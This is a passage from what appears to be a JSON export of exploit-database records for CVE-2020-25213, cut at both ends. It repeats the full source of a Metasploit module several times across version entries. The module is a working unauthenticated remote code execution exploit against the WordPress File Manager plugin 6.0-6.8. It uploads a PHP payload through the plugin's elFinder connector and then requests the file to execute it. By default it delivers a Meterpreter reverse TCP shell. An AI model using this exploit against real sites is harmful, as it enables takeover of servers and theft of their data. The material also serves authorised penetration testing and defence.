and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-15] #", "category": "", "verified": false}, "lastseen": "2021-10-14T22:56:10", "differentElements": ["sourceData"], "edition": 42}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "d6dd265d3b4b33f445d6dd520c3b47b2", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-15T23:23:47", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-14T22:56:10", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-14T22:56:10", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-16] #", "category": "", "verified": false}, "lastseen": "2021-10-15T23:23:47", "differentElements": ["sourceData"], "edition": 43}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "4454b0f19236b49619775f0b02456d8e", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-16T22:36:32", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-14T22:56:10", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-14T22:56:10", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-17] #", "category": "", "verified": false}, "lastseen": "2021-10-16T22:36:32", "differentElements": ["sourceData"], "edition": 44}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "9a0f17a56b6aafeb0e401b0fb291a34c", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-18T12:20:33", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-14T22:56:10", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-14T22:56:10", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-10-18] #", "category": "", "verified": false}, "lastseen": "2021-10-18T12:20:33", "differentElements": ["sourceData"], "edition": 45}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "5780f1f09dbea24713682df0be9f5b5b", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-18T22:21:11", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-14T22:56:10", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-10-14T22:56:10", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < 